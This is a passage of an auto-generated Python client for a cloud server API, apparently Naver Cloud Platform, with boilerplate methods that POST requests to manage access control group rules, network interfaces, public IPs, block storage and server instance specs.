['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/addAccessControlGroupInboundRule', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AddAccessControlGroupInboundRuleResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_access_control_group_outbound_rule(self, add_access_control_group_outbound_rule_request, **kwargs): # noqa: E501
"""add_access_control_group_outbound_rule # noqa: E501
ACGOutboundRule추가 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_access_control_group_outbound_rule(add_access_control_group_outbound_rule_request, async=True)
>>> result = thread.get()
:param async bool
:param AddAccessControlGroupOutboundRuleRequest add_access_control_group_outbound_rule_request: addAccessControlGroupOutboundRuleRequest (required)
:return: AddAccessControlGroupOutboundRuleResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.add_access_control_group_outbound_rule_with_http_info(add_access_control_group_outbound_rule_request, **kwargs) # noqa: E501
else:
(data) = self.add_access_control_group_outbound_rule_with_http_info(add_access_control_group_outbound_rule_request, **kwargs) # noqa: E501
return data
def add_access_control_group_outbound_rule_with_http_info(self, add_access_control_group_outbound_rule_request, **kwargs): # noqa: E501
"""add_access_control_group_outbound_rule # noqa: E501
ACGOutboundRule추가 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_access_control_group_outbound_rule_with_http_info(add_access_control_group_outbound_rule_request, async=True)
>>> result = thread.get()
:param async bool
:param AddAccessControlGroupOutboundRuleRequest add_access_control_group_outbound_rule_request: addAccessControlGroupOutboundRuleRequest (required)
:return: AddAccessControlGroupOutboundRuleResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['add_access_control_group_outbound_rule_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_access_control_group_outbound_rule" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'add_access_control_group_outbound_rule_request' is set
if ('add_access_control_group_outbound_rule_request' not in params or
params['add_access_control_group_outbound_rule_request'] is None):
raise ValueError("Missing the required parameter `add_access_control_group_outbound_rule_request` when calling `add_access_control_group_outbound_rule`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'add_access_control_group_outbound_rule_request' in params:
body_params = params['add_access_control_group_outbound_rule_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/addAccessControlGroupOutboundRule', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AddAccessControlGroupOutboundRuleResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_network_interface_access_control_group(self, add_network_interface_access_control_group_request, **kwargs): # noqa: E501
"""add_network_interface_access_control_group # noqa: E501
네트워크인터페이스의ACG추가 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_network_interface_access_control_group(add_network_interface_access_control_group_request, async=True)
>>> result = thread.get()
:param async bool
:param AddNetworkInterfaceAccessControlGroupRequest add_network_interface_access_control_group_request: addNetworkInterfaceAccessControlGroupRequest (required)
:return: AddNetworkInterfaceAccessControlGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.add_network_interface_access_control_group_with_http_info(add_network_interface_access_control_group_request, **kwargs) # noqa: E501
else:
(data) = self.add_network_interface_access_control_group_with_http_info(add_network_interface_access_control_group_request, **kwargs) # noqa: E501
return data
def add_network_interface_access_control_group_with_http_info(self, add_network_interface_access_control_group_request, **kwargs): # noqa: E501
"""add_network_interface_access_control_group # noqa: E501
네트워크인터페이스의ACG추가 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_network_interface_access_control_group_with_http_info(add_network_interface_access_control_group_request, async=True)
>>> result = thread.get()
:param async bool
:param AddNetworkInterfaceAccessControlGroupRequest add_network_interface_access_control_group_request: addNetworkInterfaceAccessControlGroupRequest (required)
:return: AddNetworkInterfaceAccessControlGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['add_network_interface_access_control_group_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_network_interface_access_control_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'add_network_interface_access_control_group_request' is set
if ('add_network_interface_access_control_group_request' not in params or
params['add_network_interface_access_control_group_request'] is None):
raise ValueError("Missing the required parameter `add_network_interface_access_control_group_request` when calling `add_network_interface_access_control_group`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'add_network_interface_access_control_group_request' in params:
body_params = params['add_network_interface_access_control_group_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/addNetworkInterfaceAccessControlGroup', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AddNetworkInterfaceAccessControlGroupResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_placement_group_server_instance(self, add_placement_group_server_instance_request, **kwargs): # noqa: E501
"""add_placement_group_server_instance # noqa: E501
물리배치그룹에서버인스턴스추가 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_placement_group_server_instance(add_placement_group_server_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param AddPlacementGroupServerInstanceRequest add_placement_group_server_instance_request: addPlacementGroupServerInstanceRequest (required)
:return: AddPlacementGroupServerInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.add_placement_group_server_instance_with_http_info(add_placement_group_server_instance_request, **kwargs) # noqa: E501
else:
(data) = self.add_placement_group_server_instance_with_http_info(add_placement_group_server_instance_request, **kwargs) # noqa: E501
return data
def add_placement_group_server_instance_with_http_info(self, add_placement_group_server_instance_request, **kwargs): # noqa: E501
"""add_placement_group_server_instance # noqa: E501
물리배치그룹에서버인스턴스추가 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_placement_group_server_instance_with_http_info(add_placement_group_server_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param AddPlacementGroupServerInstanceRequest add_placement_group_server_instance_request: addPlacementGroupServerInstanceRequest (required)
:return: AddPlacementGroupServerInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['add_placement_group_server_instance_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_placement_group_server_instance" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'add_placement_group_server_instance_request' is set
if ('add_placement_group_server_instance_request' not in params or
params['add_placement_group_server_instance_request'] is None):
raise ValueError("Missing the required parameter `add_placement_group_server_instance_request` when calling `add_placement_group_server_instance`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'add_placement_group_server_instance_request' in params:
body_params = params['add_placement_group_server_instance_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/addPlacementGroupServerInstance', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AddPlacementGroupServerInstanceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def associate_public_ip_with_server_instance(self, associate_public_ip_with_server_instance_request, **kwargs): # noqa: E501
"""associate_public_ip_with_server_instance # noqa: E501
공인IP를서버인스턴스에할당 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.associate_public_ip_with_server_instance(associate_public_ip_with_server_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param AssociatePublicIpWithServerInstanceRequest associate_public_ip_with_server_instance_request: associatePublicIpWithServerInstanceRequest (required)
:return: AssociatePublicIpWithServerInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.associate_public_ip_with_server_instance_with_http_info(associate_public_ip_with_server_instance_request, **kwargs) # noqa: E501
else:
(data) = self.associate_public_ip_with_server_instance_with_http_info(associate_public_ip_with_server_instance_request, **kwargs) # noqa: E501
return data
def associate_public_ip_with_server_instance_with_http_info(self, associate_public_ip_with_server_instance_request, **kwargs): # noqa: E501
"""associate_public_ip_with_server_instance # noqa: E501
공인IP를서버인스턴스에할당 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.associate_public_ip_with_server_instance_with_http_info(associate_public_ip_with_server_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param AssociatePublicIpWithServerInstanceRequest associate_public_ip_with_server_instance_request: associatePublicIpWithServerInstanceRequest (required)
:return: AssociatePublicIpWithServerInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['associate_public_ip_with_server_instance_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method associate_public_ip_with_server_instance" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'associate_public_ip_with_server_instance_request' is set
if ('associate_public_ip_with_server_instance_request' not in params or
params['associate_public_ip_with_server_instance_request'] is None):
raise ValueError("Missing the required parameter `associate_public_ip_with_server_instance_request` when calling `associate_public_ip_with_server_instance`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'associate_public_ip_with_server_instance_request' in params:
body_params = params['associate_public_ip_with_server_instance_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/associatePublicIpWithServerInstance', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AssociatePublicIpWithServerInstanceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def attach_block_storage_instance(self, attach_block_storage_instance_request, **kwargs): # noqa: E501
"""attach_block_storage_instance # noqa: E501
블록스토리지인스턴스할당 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.attach_block_storage_instance(attach_block_storage_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param AttachBlockStorageInstanceRequest attach_block_storage_instance_request: attachBlockStorageInstanceRequest (required)
:return: AttachBlockStorageInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.attach_block_storage_instance_with_http_info(attach_block_storage_instance_request, **kwargs) # noqa: E501
else:
(data) = self.attach_block_storage_instance_with_http_info(attach_block_storage_instance_request, **kwargs) # noqa: E501
return data
def attach_block_storage_instance_with_http_info(self, attach_block_storage_instance_request, **kwargs): # noqa: E501
"""attach_block_storage_instance # noqa: E501
블록스토리지인스턴스할당 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.attach_block_storage_instance_with_http_info(attach_block_storage_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param AttachBlockStorageInstanceRequest attach_block_storage_instance_request: attachBlockStorageInstanceRequest (required)
:return: AttachBlockStorageInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['attach_block_storage_instance_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method attach_block_storage_instance" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'attach_block_storage_instance_request' is set
if ('attach_block_storage_instance_request' not in params or
params['attach_block_storage_instance_request'] is None):
raise ValueError("Missing the required parameter `attach_block_storage_instance_request` when calling `attach_block_storage_instance`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'attach_block_storage_instance_request' in params:
body_params = params['attach_block_storage_instance_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/attachBlockStorageInstance', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AttachBlockStorageInstanceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def attach_network_interface(self, attach_network_interface_request, **kwargs): # noqa: E501
"""attach_network_interface # noqa: E501
네트워크인터페이스할당 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.attach_network_interface(attach_network_interface_request, async=True)
>>> result = thread.get()
:param async bool
:param AttachNetworkInterfaceRequest attach_network_interface_request: attachNetworkInterfaceRequest (required)
:return: AttachNetworkInterfaceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.attach_network_interface_with_http_info(attach_network_interface_request, **kwargs) # noqa: E501
else:
(data) = self.attach_network_interface_with_http_info(attach_network_interface_request, **kwargs) # noqa: E501
return data
def attach_network_interface_with_http_info(self, attach_network_interface_request, **kwargs): # noqa: E501
"""attach_network_interface # noqa: E501
네트워크인터페이스할당 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.attach_network_interface_with_http_info(attach_network_interface_request, async=True)
>>> result = thread.get()
:param async bool
:param AttachNetworkInterfaceRequest attach_network_interface_request: attachNetworkInterfaceRequest (required)
:return: AttachNetworkInterfaceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['attach_network_interface_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method attach_network_interface" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'attach_network_interface_request' is set
if ('attach_network_interface_request' not in params or
params['attach_network_interface_request'] is None):
raise ValueError("Missing the required parameter `attach_network_interface_request` when calling `attach_network_interface`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'attach_network_interface_request' in params:
body_params = params['attach_network_interface_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/attachNetworkInterface', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AttachNetworkInterfaceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def change_block_storage_volume_size(self, change_block_storage_volume_size_request, **kwargs): # noqa: E501
"""change_block_storage_volume_size # noqa: E501
블록스토리지볼륨사이즈변경 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.change_block_storage_volume_size(change_block_storage_volume_size_request, async=True)
>>> result = thread.get()
:param async bool
:param ChangeBlockStorageVolumeSizeRequest change_block_storage_volume_size_request: changeBlockStorageVolumeSizeRequest (required)
:return: ChangeBlockStorageVolumeSizeResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.change_block_storage_volume_size_with_http_info(change_block_storage_volume_size_request, **kwargs) # noqa: E501
else:
(data) = self.change_block_storage_volume_size_with_http_info(change_block_storage_volume_size_request, **kwargs) # noqa: E501
return data
def change_block_storage_volume_size_with_http_info(self, change_block_storage_volume_size_request, **kwargs): # noqa: E501
"""change_block_storage_volume_size # noqa: E501
블록스토리지볼륨사이즈변경 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.change_block_storage_volume_size_with_http_info(change_block_storage_volume_size_request, async=True)
>>> result = thread.get()
:param async bool
:param ChangeBlockStorageVolumeSizeRequest change_block_storage_volume_size_request: changeBlockStorageVolumeSizeRequest (required)
:return: ChangeBlockStorageVolumeSizeResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['change_block_storage_volume_size_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method change_block_storage_volume_size" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'change_block_storage_volume_size_request' is set
if ('change_block_storage_volume_size_request' not in params or
params['change_block_storage_volume_size_request'] is None):
raise ValueError("Missing the required parameter `change_block_storage_volume_size_request` when calling `change_block_storage_volume_size`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'change_block_storage_volume_size_request' in params:
body_params = params['change_block_storage_volume_size_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/changeBlockStorageVolumeSize', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ChangeBlockStorageVolumeSizeResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def change_server_instance_spec(self, change_server_instance_spec_request, **kwargs): # noqa: E501
"""change_server_instance_spec # noqa: E501
서버인스턴스스펙변경 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.change_server_instance_spec(change_server_instance_spec_request, async=True)
>>> result = thread.get()
:param async bool
:param ChangeServerInstanceSpecRequest change_server_instance_spec_request: changeServerInstanceSpecRequest (required)
:return: ChangeServerInstanceSpecResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.change_server_instance_spec_with_http_info(change_server_instance_spec_request, **kwargs) # noqa: E501
else:
(data) = self.change_server_instance_spec_with_http_info(change_server_instance_spec_request, **kwargs) # noqa: E501
return data
def change_server_instance_spec_with_http_info(self, change_server_instance_spec_request, **kwargs): # noqa: E501
"""change_server_instance_spec # noqa: E501
서버인스턴스스펙변경 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.change_server_instance_spec_with_http_info(change_server_instance_spec_request, async=True)
>>> result = thread.get()
:param async bool
:param ChangeServerInstanceSpecRequest change_server_instance_spec_request: changeServerInstanceSpecRequest (required)
:return: ChangeServerInstanceSpecResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['change_server_instance_spec_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method change_server_instance_spec" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'change_server_instance_spec_request' is set
if ('change_server_instance_spec_request' not in params or
params['change_server_instance_spec_request'] is None):
raise ValueError("Missing the required parameter `change_server_instance_spec_request` when calling `change_server_instance_spec`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'change_server_instance_spec_request' in params:
body_params = params['change_server_instance_spec_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/changeServerInstanceSpec', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ChangeServerInstanceSpecResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_access_control_group(self, create_access_control_group_request, **kwargs): # noqa: E501
"""create_access_control_group # noqa: E501
ACG생성 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_access_control_group(create_access_control_group_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateAccessControlGroupRequest create_access_control_group_request: createAccessControlGroupRequest (required)
:return: CreateAccessControlGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_access_control_group_with_http_info(create_access_control_group_request, **kwargs) # noqa: E501
else:
(data) = self.create_access_control_group_with_http_info(create_access_control_group_request, **kwargs) # noqa: E501
return data
def create_access_control_group_with_http_info(self, create_access_control_group_request, **kwargs): # noqa: E501
"""create_access_control_group # noqa: E501
ACG생성 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_access_control_group_with_http_info(create_access_control_group_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateAccessControlGroupRequest create_access_control_group_request: createAccessControlGroupRequest (required)
:return: CreateAccessControlGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['create_access_control_group_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_access_control_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'create_access_control_group_request' is set
if ('create_access_control_group_request' not in params or
params['create_access_control_group_request'] is None):
raise ValueError("Missing the required parameter `create_access_control_group_request` when calling `create_access_control_group`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_access_control_group_request' in params:
body_params = params['create_access_control_group_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/createAccessControlGroup', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateAccessControlGroupResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_block_storage_instance(self, create_block_storage_instance_request, **kwargs): # noqa: E501
"""create_block_storage_instance # noqa: E501
블록스토리지인스턴스생성 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_block_storage_instance(create_block_storage_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateBlockStorageInstanceRequest create_block_storage_instance_request: createBlockStorageInstanceRequest (required)
:return: CreateBlockStorageInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_block_storage_instance_with_http_info(create_block_storage_instance_request, **kwargs) # noqa: E501
else:
(data) = self.create_block_storage_instance_with_http_info(create_block_storage_instance_request, **kwargs) # noqa: E501
return data
def create_block_storage_instance_with_http_info(self, create_block_storage_instance_request, **kwargs): # noqa: E501
"""create_block_storage_instance # noqa: E501
블록스토리지인스턴스생성 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_block_storage_instance_with_http_info(create_block_storage_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateBlockStorageInstanceRequest create_block_storage_instance_request: createBlockStorageInstanceRequest (required)
:return: CreateBlockStorageInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['create_block_storage_instance_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_block_storage_instance" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'create_block_storage_instance_request' is set
if ('create_block_storage_instance_request' not in params or
params['create_block_storage_instance_request'] is None):
raise ValueError("Missing the required parameter `create_block_storage_instance_request` when calling `create_block_storage_instance`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_block_storage_instance_request' in params:
body_params = params['create_block_storage_instance_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/createBlockStorageInstance', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateBlockStorageInstanceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_block_storage_snapshot_instance(self, create_block_storage_snapshot_instance_request, **kwargs): # noqa: E501
"""create_block_storage_snapshot_instance # noqa: E501
블록스토리지스냅샷인스턴스생성 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_block_storage_snapshot_instance(create_block_storage_snapshot_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateBlockStorageSnapshotInstanceRequest create_block_storage_snapshot_instance_request: createBlockStorageSnapshotInstanceRequest (required)
:return: CreateBlockStorageSnapshotInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_block_storage_snapshot_instance_with_http_info(create_block_storage_snapshot_instance_request, **kwargs) # noqa: E501
else:
(data) = self.create_block_storage_snapshot_instance_with_http_info(create_block_storage_snapshot_instance_request, **kwargs) # noqa: E501
return data
